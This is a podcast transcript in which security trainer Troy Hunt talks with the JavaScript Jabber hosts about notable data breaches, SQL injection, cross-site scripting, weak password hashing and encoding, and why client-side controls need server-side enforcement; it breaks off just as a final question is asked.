Show Notes

02:32 - Troy Hunt Introduction
04:12 - Why should people care about security?
06:19 - When People/Businesses Get Hacked
09:47 - “Hacking”
11:42 - Inventive “Hacks”
13:24 - Motivation for Hacking/Can hacking be valuable?
17:08 - Consequences and Retribution
19:10 - How to Build Secure Applications
20:47 - Weighing in UX
22:50 - Common Misconceptions
  • Password Storage
  • Encoding
  • Cookies
31:27 - Passwords (Cont’d)
33:16 - Justifying the Importance of Security
35:24 - Client-side Security
44:10 - Resources
45:27 - Routing
47:21 - Timeouts
51:36 - Cached Data
Picks
Special Guest: Troy Hunt.

Transcript

 [This episode is sponsored by Frontend Masters. They have a terrific lineup of live courses you can attend either online or in person. They also have a terrific backlog of courses you can watch including JavaScript the Good Parts, Build Web Applications with Node.js, AngularJS In-Depth, and Advanced JavaScript. You can go check them out at FrontEndMasters.com.]

[This episode is sponsored by Hired.com. Every week on Hired, they run an auction where over a thousand tech companies in San Francisco, New York, and L.A. bid on JavaScript developers, providing them with salary and equity upfront. The average JavaScript developer gets an average of 5 to 15 introductory offers and an average salary offer of $130,000 a year. Users can either accept an offer and go right into interviewing with the company or deny them without any continuing obligations. It’s totally free for users. And when you’re hired, they also give you a $2,000 bonus as a thank you for using them. But if you use the JavaScript Jabber link, you’ll get a $4,000 bonus instead. Finally, if you’re not looking for a job and know someone who is, you can refer them to Hired and get a $1,337 bonus if they accept a job. Go sign up at Hired.com/JavaScriptJabber.]

[This episode is sponsored by DigitalOcean. DigitalOcean is the provider I use to host all of my creations. All the shows are hosted there along with any other projects I come up with. Their user interface is simple and easy to use. Their support is excellent and their VPS’s are backed on Solid State Drives and are fast and responsive. Check them out at DigitalOcean.com. If you use the code JavaScriptJabber you’ll get a $10 credit.]

[Let's face it. Bookkeeping is hard and it's not really what you're good at anyway. Bench.co is the online bookkeeping service that pairs you with a team of dedicated bookkeepers who use simple, elegant software to do your bookkeeping for you. Check it out and get your free trial today at Bench.co. They help you focus on what matters most and that's why they're there. Once again that's Bench.co.]

JOE:

Hey everybody and welcome to episode 201 of the JavaScript Jabber Show. Today on our panel we have Aimee Knight.

AIMEE:

Hello.

JOE:

And I am Joe Eames. I'm going to be your host today. We're running on a bit of a skeleton crew which is great because we have the most important panelist, Aimee. And that's all that matters. [Laughter]

JOE:

And as our very special guest today, we have Troy Hunt.

TROY:

Hey guys. Thanks for having me.

JOE:

Now, we're here to talk about security but before we get into that, could you take a brief moment? Maybe give us a little bit of a background in yourself, why this topic is of interest to you and your experience with it.

TROY:

Yeah, sure. So, I have a predominantly development background. I started building web… wow, '95 now, just realized it's 21 years. I kept saying 20 but [laughs] we've ticked over. So, I've spent a lot of time building web. Probably for the last decade I've been a lot more security focused on now. An independent trainer who writes a lot of courses for Pluralsight online, so in fact a bunch of what we're going to speak about today is no doubt in my Pluralsight courses. And I travel around the world doing conferences and workshops and security things.

JOE:

Wow. So, does that essentially occupy a hundred percent of your time?

TROY:

Yeah, between those things it does. For the last, let me see, since April 2015 I've been independent. For about a decade and a half before that, I was in big corporate at Pfizer pharmaceuticals. And I was looking after their application architecture for the Asia-Pacific region. And then I made the move to go and actually do what I want [laughs] on my own terms which I am extremely happy about. And now all of that yeah, does occupy all my time. So, I've just pushed out my 20th Pluralsight course. And we're at the middle of Feb now. And so far I've spent about a month this year [chuckles] overseas doing training and workshops and conference talks. That is occupying a rather significant portion of my time at the moment.

JOE:

That's awesome. Cool, well let's get into talking about security. First I think it would be nice maybe if you just gave us a brief overview of the importance of security. Maybe like your… since you said that you've given a lot of talks, the 30-second bit about why people should really care about security.

TROY:

Well, I think the thing at the moment is that it's such a headline every single day. Even before I got on the call here, I'm reading Twitter and there's a hospital which is infected with malware and a three and a half million dollar ransom that's sitting out there. And this stuff is not just tech news stories. This is sort of mainstream news. And if we think back just to the last year, about how much all of us, even as consumers, our non-technical significant others or family, have been exposed to really serious security incidents, things like Ashley Madison, TalkTalk in the UK, obviously we had things like the Sony debacle a little bit earlier, it is just absolutely pervasive at the moment, the attacks against online systems. So, it's impacting all of us whether we're consumers using these systems or whether we're developers building them. And it's something that we clearly have a really serious problem with at the moment.

JOE:

Yeah, that's quite true. Another interesting one I think was Sony, the Sony hack.

TROY:

Yeah, that was bizarre in so many ways, to have on the one hand defacement and demands to take down movies, and then on the other hand for it to have turned out to likely [chuckles] be state sponsored by North Korea. It's just so bizarre in so many ways. And the really weird thing is we keep seeing these instances and going, “Well this is just unprecedented. This is crazy,” and then something else unprecedented comes along. Actually Madison was unprecedented. We had over 30 million people with really sensitive personal details exposed. And then a few months ago the VTech toy manufacturer was unprecedented. We had hundreds of thousands of kids exposed. And yeah, it just seems like on a very regular cadence, there is something that comes out and we go, “Wow, I never saw that coming. This is crazy.” Look, it's early in 2016 yet but we're going to see a lot more of it this year no doubt.

JOE:

So, when you hear about one of these big major hacking events like Ashley Madison for example or Sony, do you always kind of in your mind think, “Wow, those guys. They did a terrible job on their security”? What goes through your thoughts when you hear one of these big major events?

TROY:

Well, I'm always curious. And of course myself and a bunch of other people in the security, and [6:38] development communities as well, always want to know the details, right? So, what happened? What went wrong? And very often we get to find out by courtesy of data being dumped. So, we get to see what was inside their internal system. And very often we see code being dumped as well, plus we frequently see particularly when it's this class of hacker we know as the hacktivist, we very frequently see them talking about how they exploited the system. So, I'm always sort of curious. And I guess in fairness, the levels of egregiousness, in terms of how bad the security is, differs wildly.

So, on the one hand I can think of say Patreon last year. Patreon takes payments for fledgling artists so it's like crowd-supporting an artist. I was [chuckles] unfortunately in that data breach because I'd supported someone. And you look at what they did and they actually had a pretty good setup. They had everything encrypted in terms of any person identifier info. They had great hashing for their passwords. They just made one bad mistake. And of course, it only takes one. But the one bad mistake, putting debug settings in a production-facing environment, that was the gateway. But we're sort of interested in that from the perspective of, here's an organization that's actually done a pretty good job.

And then at the other end of the scale you take someone like VTech the toy maker and these guys have got no encryption anywhere on their connections. They've got direct object reference risks where you change a number in the URL, you get someone else's data. They had SQL injection risks. Even when you login to the system, they are returning these SQL statements that were run against the database in the API response, which is just [laughs], it's just bizarre. I can only speculate as to why that even made sense.

JOE:

Geez.

TROY:

And then you look at that and you go, “How did you guys not get owned much, much earlier?” And hey maybe they did and we just didn't know about it. But look, we just see a massive breadth of competency and a massive breadth of the sophistication required to actually break into the system in the first place.

JOE:

So, there's so much about this and one of the cool things about these sorts of things is the stories that get told like you said. Like, you could make movies about these hacking events. Like, I can totally imagine a movie about Sony getting hacked, right?

TROY:

Yeah, probably. I guess we've seen various classes of hacking movie that frankly have been pretty terrible [laughs] [inaudible] in the past.

JOE:

[Laughs]

TROY:

But yeah, so anyway that'd be a very meta sort of movie, wouldn't it? A movie about the hack which was brought about by the movie about attacking North Korea. [Laughs] It got a little bit cross-eyed. But some of it is stranger than fiction. And some of it is enormously intriguing as well. So, things like the Stuxnet attacks against nuclear power facilities in Iran some years ago, certainly state-sponsored, likely the US and Israel, yeah actually attacking air-locked machines that run centrifuges to make them spin at a rate that was too fast and burn out motors. That stuff is very, very, it's almost sort of science fiction. But it's actually happening in real life.

JOE:

There's kind of probably a wide gamut of hacking. Obviously there's the social engineering hacking which I recently saw a crazy inventive one where somebody had sent what looked like a Google Doc invite and you click on it and then they ask you to log into your Google Drive account, which I just knew myself I shouldn't have to login. I'm already authenticated. So, the fact that they're asking… and then I just glanced, I didn't think to glance at the URL until that point, but the URL was not Google's URL.

TROY:

[Chuckles] So, that's a perfect example. I just published a couple of courses on social engineering actually. But it's a really good segue into something JavaScript as well, because you just made me think of a very cool framework that's JavaScript-driven that allows social engineering of that type. So, there's a project called BeEF Project, B-E-E-F project. And the BeEF Project is an exploit framework where if you can embed a JavaScript file into the target website, so for example if you can [10:44] in the middle of text or in the middle of the connection, or if you can use a cross-site scripting attack and you can get that file loaded by the client, it gives you a persistent hook. And the browser keeps calling back to a command and control web server.

And then you as the attacker, you sit there and you have this nice little responsive UI. And you can see who has now been hooked. And then when they hook, you click on their IP address and you say, “I would like to send you a test social login.” And what happens is that the page you're on has a little Facebook modal pop up in the middle of the screen, or it reloads the entire page to the Google login page. And unless you're explicitly looking at the URL and you're looking for the right domain and you're looking for a security certificate, you'd be fooled. And you'd have exactly that situation you just spoke about there.

JOE:

Geez, that's crazy.

TROY:

It's kind of cool. It's kind of awesome. Go and have a look at BeefProject.com. [Laughs] It's pretty neat.

JOE:

Cool. So, that sort of makes me think what are some of most inventive types of hacks that you've seen?

TROY:

Well, that one's always kind of interesting. I guess some of the ones that maybe we sort of start with the basic ones. The ones that are just very, very successful and seem to keep appearing over and over again are things like SQL injection. So, SQL injection has been around for well and truly over 10 years. We've been very conscious of the risks. Really, it's gone back since we've created data-driven websites. And we're seeing that one over and over again. And I guess what's curious about that is how accessible it's becoming to people.

So, we're seeing incidents like TalkTalk, the [inaudible] UK Telco, made a lot of news a few months ago because a 15-year-old was able to break into their system using SQL injection. And I guess what's inventive about that is that we've seen tools emerge that make this process extremely simple. So, tools like sqlmap. And sqlmap is very good whether you're a penetration tester doing good things or whether you're a 15-year-old kid doing bad things, it's very good just to point to the URL and [suck data out]. And so, I think that's inventive from the tooling perspective.

And then obviously at the other end of the extreme, things like we just mentioned, Stuxnet. So, state-sponsored malware designed to infect air-locked machines which would then actually make [inaudible] systems that control things like nuclear… uranium I suppose. I'm not a nuclear guy. [Chuckles] But making the enrichment of nuclear fuels, making those centrifuges over-spin and actually burn out motors, that is very freaky stuff. That is very sci-fi stuff.

AIMEE:

So, you talked about a 15-year-old and then you talked about this. What do you think the motivation is for the majority of cases?

TROY:

Well, I reckon in the cases where we're talking about… let's call them this collective of hacktivists if you like. In the case we're talking about hacktivists we're often looking at kids. I think it's nothing more than curiosity. I really do. And on the one hand you kind of want to say, “Look, go to your room and think about what you've done,” [chuckles] because they're doing enormous damage.

AIMEE:

[Chuckles]

TROY:

But on the other hand I can sort of understand that it is just a childish curiosity a lot of the time. And particularly when we're talking about that age, 15, 16 years old. And we've all been there. We've all gotten up to trouble before. But probably before we had access to the internet like we do today, fortunately before camera phones as well. But anyway, [chuckles] I think in those cases a lot of the time it is just curiosity. They're sort of finding their way online. They're often being coerced by other people as well. They're in there on forums chatting to people. And when it comes down to something as simple as, “Here, download this free software which will take you 60 seconds and now copy and paste this URL into it,” that's all it's taking.

And I guess what concerns me a little bit in these cases as well is that these kids are often getting the book thrown at them. They're getting records. They're sometimes getting custodial sentences for something which on the one hand yes is malicious and damaging yet on the other hand is probably not reflective of a longer term criminal aspirations.

AIMEE:

So, as far as that point too, it seems like although the stuff is bad in a way, it can be valuable because the threat forces you to think more carefully about what you're doing.

TROY:

Well, you'd hope so. And I guess this is the really poignant thing here. If these organizations are getting owned by 15, 16-year-old kids, what are they doing?

[Laughter]

AIMEE:

Yeah.

TROY:

What is going so wrong that a kid in their bedroom, and in this particular case it was a kid in Belfast who broke into TalkTalk I assume in his bedroom because where else are you going to be hacking from [chuckles] when you're a 15-year-old kid?

JOE:

Right.

TROY:

They don't have lairs or things like that.

JOE:

[Laughs]

TROY:

So [chuckles] to be able to do that to organizations like that, same sort of thing with VTech in terms of the ease of exploitation, same sort of thing with many of these other companies, there is something fundamentally wrong inside the organization that's allowing this to happen. And there's a bit of a risk of people calling this victim-blaming because certainly the likes of TalkTalk were victims of this attack as well. But there was undoubtedly significant negligence in order for that to happen in the first place.

JOE:

Right. Well, there are a couple of things going on there, right? It's not like the 15-year-olds are truly acting in isolation because they're probably written tools built by much more experienced and smart people. Well, maybe not smart but more experienced hackers, right? They're jumping on a simple wave.

TROY:

Yes and no. There's certainly a degree of that which is true, which is other very smart people have written the tools. And they are very sophisticated tools in some cases. Things like sqlmap are enormously powerful. Yet on the other hand, the kids are falling into these circles. They're having communications with other people that are teaching them how to use them. They are consciously going out and looking for these websites to exploit. We're seeing for example very frequently using Google Docs. So, Google's searches that are very carefully crafted in order to find sites that are likely at risk. There is a conscious exploration that they're going through. But I think that when they're doing this, they're just not quite savvy enough or aware enough of the consequences.

JOE:

Yeah, and that's another interesting thing, right? With a teenager we're talking about somebody that hasn't yet gone through much of life. Their prefrontal cortex has not fully formed.

AIMEE:

[Laughs]

JOE:

So, making informed judgments is a little bit less… for example if your bank happened to keep its vault, not just the doors open but the money maybe out on a table…

TROY:

[Laughs]

JOE:

Then anybody that grabs some money and walked out got arrested and thrown in jail for 30 years, you might think that that's a little unfair, right?

TROY:

Well, this is the problem, because yes and no. [Chuckles] If you've consciously gone and stolen the money or the data or whatever sort of paradigm you're going to compare it to, then clearly you've committed a crime. And you've got to have some form of retribution. Something has got to happen. I guess the bit that's increasingly frustrating me is that the folks that are proverbially leaving this money out on the table, what's happening to them? Because it is impacting their customers in a very negative way. We take the VTech thing with the kids. So, here's a company that's making little tablets. So, imagine if Fisher-Price was to make an iPad. Picture what it would look like. Lots of bright colors and lots of plastic and so on. And they're making this and collecting kids' data and then not looking after it properly. And so far, they've arrested the alleged hacker in the UK and we've not seen any more news on that. But the thing I haven't seen any news on is what's happened to VTech? So, who is going to hold them accountable for the loss of this data? Because this is kids' information. And look, there are some moves afoot. We're seeing in the EU for example, we're going to see fines apparently of up to about four percent of gross revenue come 2018 for organizations that do lose data in this way, which hopefully might make some difference. But to date we've seen very, very little retribution against organizations that have proverbially left the money out on the table and then someone's walked along and grabbed it.

AIMEE:

So, the stuff that I kind of wanted to talk about, if you're on a greenfield project, how do you go about securing things? Do you just go little but little and build it up over time? What is your approach that you recommend?

TROY:

Look, if you're on a greenfield project, you've got a little bit of luxury in that you don't have any sort of legacy dependencies to deal with. And what we'd really like to see there is to me it all starts with the developers. So, that's the point at which code is actually written. And that could be good code, it could be bad code. So, that's if we're talking about a greenfield project.

If we're talking of brownfields, the code that we've already got, legacy code for want of a better word, it becomes a much harder problem, because now you've inevitably got a whole bunch of different issues spread throughout the codebase. And this is a place where things like automation can help. So, automated tools, tools such as dynamic analysis where you'll run various products against a live running website and it will pick up things like SQL injection and cross-site scripting, or tools like static analysis. So, tools that will actually read source code and come back and identify risky patterns.

So, there's a bit of a combination of approaches there, depending on where you are in the life cycle. And ideally you'd want to try and have a combination of competent professionals and effective tools that you'd run throughout the project, as soon as you can. And that's going to start to move the needle in the right direction. None of these things are [2039 panacea] either. I think some people would really like to get security in a box and unfortunately it's not quite that simple.

AIMEE:

So, my only other question on this topic right now is how do you weigh in UX? So, some things there's really no wiggle room. But then for other cases, especially if you're on a greenfield project and you want to increase users, how do you weigh the trade-offs UX-wise? I know you've mentioned before, obviously 2-factor auth is a gigantic pain in the butt. But it's also really valuable. So, I'm trying to think of other situations like that. Maybe you have better examples, because that's not the best one.

TROY:

Okay, so you mean in terms of when there is a UX compromise in order to add security?

AIMEE:

Yes.

TROY:

So, I think the answer is it can be done in degrees and increments. So, let's take something like multi-step verification. I have that available on my Facebook. I can't remember the last time I actually needed to use it, because I login with my PC that's sitting here on my desk in my office. And until I actually fire up a totally new browser, a totally new machine, I won't need to enter it again. So, they've got an approach where they say, “Look, let's just make sure that for each new machine that we identify we go through the two-step dance. And we know who you are and then we're good.” Now compare that to something like every time I log onto my Microsoft Azure account which manages all of my web assets, I have to enter it every single time. Different levels of criticality and in each case they've decided that there's going to be a different challenge requirement.

So, one of the things you can always think about is rather than it being sort of a boolean state, “Do we have to challenge people every single time?” “Can we challenge them at points where we need that additional verification based on the nature of the app?” So, I guess the point there is to try and tailor it to what it is that you're building because ultimately the security is great but if people don't like using the system you've probably got an even bigger problem.

JOE:

Good answer. So, one question I'd like to ask if there may be some common misconceptions out there about what it takes to build something secure, like things that people do thinking they're making things secure but either they're not or they're even making it worse. And then do you have any personal pet peeves when it comes to people's security practices?

TROY:

Yeah, good question. And the first misconception actually [chuckles] that I think we should spend a little bit of time on is the misconception that security has to cost money. So, this is something I

often hear people say, it's almost like, “Well we could build it securely but then we'd have to pay more money.” And I'm going, “Well, hang on a second.” [Chuckles] Let's look at the things that people get wrong in software and think about whether it actually is more expensive to do it right.

So, let's look at something like SQL injection. Does it actually cost more money to have your queries properly parameterized? Well, very often it's actually more efficient because these days people use a lot of things like object relational mappers, ORMs. So, they get the systems from the data tier through to the app tier, which is actually a fairly expeditious way of writing code. And when you do that, you almost certainly have no SQL injection risk because things like parameterization are done automatically for you. So, that's very efficient.

Little things like, “Do we just put HTTPS over the entire site?” If you make your entire site HTTPS it's very, very easy. Yeah, everything just requires a secure connection. There's no trying to jump in and out of secure versus insecure. That's dead simple. And it's a very secure way of making it a default secure experience. So, that's probably one of the first things.

I think then in terms of areas that developers often get things wrong, one thing that comes to mind is password storage. And very often we see passwords stored in an insufficient fashion. So, we still see a lot of plain text. Last year we had the TripleO web host data breach. 13 million accounts with passwords in plain text. So, no protection whatsoever which is just, yeah I was going to say unheard of. Unfortunately it's not unheard of. But it's unimaginable [chuckles] that you would have this now. Sometimes we see it encrypted which is pretty useless also, because as soon as the system gets broken into and comprehensively compromised and private keys get extracted, well everything gets decrypted.

And then we see different levels of understanding in terms of hashing algorithms. So, people will say, “Well, bcrypt or rather MD5 is weak so we shouldn't use MD5. But if we use salted MD5 we're fine.” And then it's like, well, hang on a second. You can calculate multiple billions of MD5 hashes a second. Just a couple of weeks ago, I wrote about the number of VTech, not VTech, vBulletin data breaches I've been looking at that use salted MD5 and showed how fast I could crack those. And people were amazed. It's like, well yeah, you can calculate multiple billions per second. You're going to crack them pretty quick.

So, a lot of developers don't understand about the existence of adaptive hashing algorithms, so hashing algorithms like bcrypt where you can actually force them to run very, very slow. So, if anyone gets your passwords that are hashed in the system, it is extremely difficult to actually extract much of value out of them. So, I think that's one of the areas they get things wrong. And that probably also answers the misconception question as well. This is one of the things that people building systems frequently don't understand, how weak most of their password storage is.

JOE:

Interesting. I certainly had no idea about that MD5 thing.

TROY:

Yeah, it's curious. And if you go and look at a piece of software like Hashcat, so at Hashcat.net you can find Hashcat which is free, open source has cracking software, very, very good hash cracking software. It's what the pros use. Have a look at just how fast some of these hashes can be calculated. And we're talking about consumer-level graphics card from five years ago being able to calculate in somewhere in the order of about eight billion MD5 hashes a second. And when you can have that many guesses at what a password is per second, it doesn't take you too long to crack a significant portion of passwords in a typical system.

JOE:

Wow. So, does that mean… I assume that this is true that there are a lot of places where people might go and turn to, “Alright, what's the security best practices?” and find actual misinformation as well?

TROY:

Yeah. That actually happens quite a bit. And then I tweet about it profusely. [Laughs] And then hopefully…

JOE:

[Laughs]

TROY:

That changed things. There are a couple of examples that come to mind. In fact, I've got a talk I've been doing called '50 Shades of AppSec' and I show these, 50 various security [inaudible] things.

JOE:

Gosh.

TROY:

Look it up, if anyone wants to watch it. There are a few recordings of it. It's really good fun. But [chuckles] there's a few examples in there about some of the public advice we get about security. So for example, I've got a Stack Overflow response in there. And someone asked the question, they said, “I'm trying to store passwords in my system. How do I do it?” And this person comes along and says, “Alright, well here's what you do.” And it was a very, very fast answer too, so someone's copied and pasted their code. They say you take the password and then you go through and you get the ASCII value of each character and you add five. [Laughs] And then what you do is you store that in the database. And we'll call the function encrypt and that way it's encryption. [Chuckles]

JOE:

[Chuckles]

TROY:

And then in order to decrypt you go through and you get the ASCII value of each character and you subtract five. So, we see that same question actually had another response that was basically just Base64 encoding. [Inaudible]

JAMISON:

You mean Base64 encrypting. [Laughter]

TROY:

Well, they did call the method encrypt. So, I'm not sure if that really… no, that doesn't help. [Chuckles] So, we see stuff like that. Some other really interesting examples in that same talk, I've got a screen cap of…

JAMISON:

No actually, can I stop you for one second?

TROY:

Yeah, sure.

JAMISON:

We're all laughing about this. There might be people that don't know why that's a bad idea. Do you want to talk really quick about why that isn't a thing you want to do?

TROY:

Well, because encoding, the problem with encoding is you have decoding. [Chuckles] So yeah, encoding is just meant to encode a character set into another common character set. So for example, Base64 you're going to encode everything into ASCII characters. And that's going to be great insofar as you can hand around other character sets in a fashion that anything that's just speaking ASCII can understand. So, you'll often see encoding so that you don't need to worry about multi-byte character sets and things like that. But the problem is that you literally just go and Base64 decode. And I've seen examples obviously of password storage done in Base64 which may be relevant insofar as narrowing everything down or distilling everything down  into a common character set. But it's useless in terms of privacy and confidentiality.

I've seen other cases where people have done things like the remember me feature on a web page, in fact Black&Decker used to do this, I wrote that in a blog post. So, the remember me feature when you logged in and you check that little box that says 'Log me in automatically next time', they're actually saving the username and the password in a cookie with Base64 encoding not flagged as HTTP only either. So, when you have a cookie that's not flagged as HTTP only, you can write client script to access it. So, you have one cross-site scripting risk and now someone can start sucking passwords out of your cookies.

JOE:

Yeah. [Laughter]

JOE:

That's [inaudible].

TROY:

That's one way of putting it.

JOE:

That's a delicious cookie.

TROY:

So, that's a common set of misconceptions. There are some really interesting things we see even on the consumer side of things. I'm just thinking about some of the slides from that talk. [Chuckles] There's one in there where there's an HDMI cable and it's an HDMI cable in typical packaging. And I don't know if anyone's bought an HDMI cable lately but the amount of FUD around HDMI cables, about these ones are gold or nickel-plated or whatever so that the digital signal is not disrupted in any way…

JAMISON:

It gets massaged by the luxurious materials.

TROY:

[Laughs]

JAMISON:

Each byte carefully handcrafted.

JOE:

[Laughs]

TROY:

Anyway, this HDMI cable that the packaging explains how the cable has anti-virus protection, it's just such an unfathomably stupid thing for a manufacturer to put on a package.

JOE:

[Laughs]

TROY:

Yet on the other hand I can understand your laymen looking at this and saying, well maybe this is good because this other one over here doesn't have anti-virus protection. And they're not necessarily going to understand why that's just an outrageous claim.

JOE:

[Chuckles] That's awesome. So, this is everything that I know about security. If I make sure they have a capital and a number in their password, then that's secure, right?

TROY:

Yeah, capital P for password, put a one at the end. [Chuckles]

TROY:

Well look, this is part of the problem. And passwords in particular, and I guess passwords are sort of the most prominent place that people touch security. So, everyone who has an internet presence has passwords. That's sort of their [inaudible] to security. And unfortunately we're sort of in this situation where passwords have become something that is both a necessity and an evil. And we really don't have a better mousetrap yet. We've got things like multi-step verification that sit on the back of it. We've got biometrics particularly things like say i-touch on i-devices which work very, very well. Yet we still depend on passwords at some point in time.

And even the prevalence of good password managers still doesn't solve the problem when you've got everyday consumers trying to create things that they can remember.

JOE:

Right. It's a big problem. I've gotten hacked myself a couple of times and one was because my username and password got reused on a different site. So, somebody hacked a really low-security place and then used it someplace that was a little bit more high security.

TROY:

Yeah. And you know, that raises one other point as well insofar as… I see a lot of times people create a website and they say the information on this site is not particularly valuable. So, we're not going to worry as much about security. Or alternatively you'll see an individual say, “My information on this site isn't quite as valuable so I'm not going to worry too much about the strength of my password,” without realizing the broader impact on the ecosystem. Your website gets hacked and then the passwords that you're storing for other people get exploited in other places. So, you've sort of got a social responsibility that goes beyond your own site.

JOE:

So, that leads me into one thing I did want to ask and then after that I think we want to switch the topic a little bit to more client-side. But that is if your company has the attitude of, “Hey, what we've got is very low-security, low importance. Let's not worry too much about security,” how do you either as a developer at a company like that justify that it is important? Or is there a bang for the buck that these types of companies can engage in? And I think there's a specific question I want to ask with that, and that is: Is it better to store usernames and passwords yourself or is OAuth better for them to handle?

TROY:

Well, they’re all just different, right? So, in terms of the first point about an organization thinking their security profile isn't that important, to my earlier point for the most part it's not going to cost you any more to do things securely. The difference is simply the people building the systems having some competence in terms of what the secure patterns look like. So, it doesn't have to be a cost when there's competent people involved. So, that's the first thing.

And then in terms of if we go down this OAuth and we use say social providers for login, that can be great. It solves a bunch of problems for you. You no longer have to store a password, do password resets, implement multi-factor verification, all the other stuff that goes with account management. So, that's fantastic. The counter-problem that you have to deal with, is that a usability barrier for my users? So for example, if you had a lot of, let's say you had a very elderly audience who may not want to… who may not even have Facebook accounts and the like in the first place, or who may not feel comfortable using social credentials in order to log onto your website, that could be a problem.

But the other option as well is using identity services. So, I'm a Microsoft-y sort of guy. If I was in Azure I could use Azure Active Directory and still have my own interface that sits on top of the whole thing. But they take care of all the mechanics underneath. So, there are middle grounds that you can find to try and divest yourself from some of the responsibility of managing this stuff and still have a nice user experience.

JOE:

Cool.

JAMISON:

So, it sounds like we've talked a little bit about some server-side related things. There's a lot that goes into implementing secure password storage. You talked about SQL injection. With the move towards putting more and more logic in the client in JavaScript and the browser, what kind of security practices does that bring with it?

TROY:

Yeah, good question. There's a few ways we could go with this. So, one way is start first of all to think maliciously about what could you do if you could run script on the client? And this is sort of one of the things that I often ask in my workshops. And people, they sit there and they think a little bit. [Chuckles] And the easy answer is that if an attacker has the ability to start running arbitrary script in the client they can do just about anything. So, they can rewrite the DOM. They can add elements to the page, remove elements. They could pop up a social login like we spoke about before. They could access any cookies that aren't HTTP only. They could do an enormous amount of stuff. So, when we start to think about the client we then say, “Okay, well, what are sorts of risks which can exploit that client and what defenses do we have?”

So, a really good example I mentioned earlier on, we've got things like cross-site scripting risks. Now we can have cross-site scripting or XSS as you'll often see it referred as a reflected risk. So, someone goes to a URL, the URL contains a string that is then reflected in the response. So, if you look at say any Google search query, you'll see your search query in the URL. That then gets shown in the HTML response. If you could possibly change that search query to say a script tag and then execute anything that you would like to in the browser, well then you've got a problem. Because now we might be doing things like accessing cookies and sending them off somewhere else. So, that would be reflected cross-site scripting.

Persistent cross-site scripting where you put this in the database. So, what if you can leave a comment on a website and that comment is just a script tag. And then you go and write whatever JavaScript you want and perform any actions whatsoever that you would like on the client.

And the other one that's a little bit less common is a DOM-based cross-site scripting attack as well. So, what if you could modify the DOM by various processes? And let's say you've got something like Angular running. Angular takes import, it renders it into the DOM, and you're actually able to modify the structure of the page. So, we've got several different classes of risk there. One thing that's come along in terms of client-side defenses recently that is not very, very well-implemented, one of these defenses is called Content Security Policies or CSPs. So, what you can do with a CSP is you can actually instruct the client in terms of what it is allowed and not allowed to do. And when we speak about clients we're predominantly talking about browsers here.

But a CSP can say for example, “This page or this site is not allowed to run any unsafe inline script.” So, you're not allowed to have a script tag in the HTML because that's often the way that cross-site scripting attacks are mounted. You could have a CSP which says, “This page is not allowed to be framed inside another page which might then lead to something like a click-jacking attack where they trick the user into clicking a button on the target website.” So, there are lots of things coming down which implement security controls in the client. And the clients themselves, predominantly the browsers, are getting much, much better at recognizing these security paradigms and adding new things to protect users as well.

JAMISON:

So, I'm still not sure what I as a client-side developer, what actions should I be taking? Or is this something that the frameworks will handle for me?

TROY:

Well, I think…

JAMISON:

Not with CSP particularly but just with client-side security in general.

TROY:

The other main thing with client-side security is that if you're using a framework, and let's say it's Angular which is what I'm most familiar with, is to understand what are the security paradigms within that framework. So for example, is Angular going to automatically output in code responses? And certainly with Angular that's your default position. You can still output in code, or rather not output in code untrusted data. But if someone tries to exploit a risk in your website running Angular to get script to run in the client, how is Angular going to handle it? And more than anything, I think the thing here is to actually understand how the framework actually deals with it.

And the risk I say is that very often these days we get people come and use client-side frameworks which are getting better and better and do a very good job of actually abstracting way the mechanics underneath, and they don't understand how the security actually works. For example, how does your client-side framework do anti-forgery tokens? Are you actually consciously thinking about that when you're constructing your API calls? Or is that something that happens implicitly or as is often the case, is that something that doesn't happen at all? And what you'll find is that all of these frameworks do have some pretty good documentation around what their security paradigms are as well. So, I'd really encourage people to go and try and understand what the controls are that they have in place.

JOE:

So, there's a specific scenario that I've actually been dealing with lately. And that is sort of the difference between authentication, an authenticated view versus an unauthenticated view on the client-side. So for example, with Angular 1 you can easily specify in there that, “Hey, unless you're authenticated you can't access these particular routes.” But that's not really secure because it is on the client. So, somebody could do some script injection and potentially rewrite that so that a route that you are trying to make unavailable is now available. Could you give us some clarity, feedback on that?

TROY:

Well, I think probably the overarching theme there for people to be really aware of is what controls are just purely client-side controls versus what controls actually have cross-running server-side controls. Because what you got to remember is that anything in the client can be modified. So, you might create a beautiful, elegant single-page app style implementation with lots of neat client-side scripting. And you're building this so that it integrates with the backend. But how many of the controls just purely exist on the client? And as soon as you take the client either out of the picture or you modify the client and modern-day browser dev tools are very, very good at modifying the DOM, what happens then?

So for example, if you have let's say security trimming with certain features are not visible on the client, does that have the same cross-running server-side control? So, you may no longer have the button that allows you to do something like perform a transaction but if you were to hit that API directly, let's say you went and just created an HTTP request with wget or curl or something like that, could you still perform that action? So, are all those client-side controls actually replicated on the server? Some framework, some server-side frameworks are very good at doing that. So, they'll emit client-side controls and they'll implement the server-side controls. But the client-side only frameworks, you're probably going to have to think more about, does that API on the backend actually implement the same level of security?

JAMISON:

I've heard it described as client-side security is basically advisory. And that…

TROY:

Yeah. And it is. And how it's…

JAMISON:

You just enforce it on the server.

TROY:

It's good, right? Because client-side based security is, it's responsive. It keeps load off the server. It allows you to do some really neat things. But you've got to complement it. And this is also the sort of things that automation can pick up. Automated tools are very good at picking up what sort of controls might be lacking on the server. So yeah, you've got to… I think actually that's a really good way of putting it. Advisory is really neat. [Laughs]

JOE:

[Laughs]

TROY:

So, assume that it's not going to be there. And another thing you can do as well for folks listening to this that are web developers, you're probably familiar with tools like Fiddler or Charles proxy on the Mac. They're really neat ways of actually watching requests that are going from the client to the server. And then dragging them over to the composer and actually modifying. So, have a go at that as well, particularly if you've got a multi-monitor setup. Put your HTTP proxy on one screen, your web app on the other screen, browse around, watch the requests. And then just try and mess it up as bad as you can [chuckles] and reissue requests with malicious pieces of data or remove things like the bearer token or the authorization cookie and then see what happens.

JOE:

Do you have a course where you talk about this in more depth?

TROY:

Yeah, so I have got an AngularJS security course on Pluralsight which is probably the most relevant to the audience here. Otherwise something like Hack Yourself First which is a Pluralsight course. It's also the workshop I do, which goes through all the sorts of things we spoke about in terms of cross-site scripting defenses and a whole raft of different web-centric security paradigms.

JOE:

For somebody who's a React developer, would they find still a fair amount of valuable content in those?

TROY:

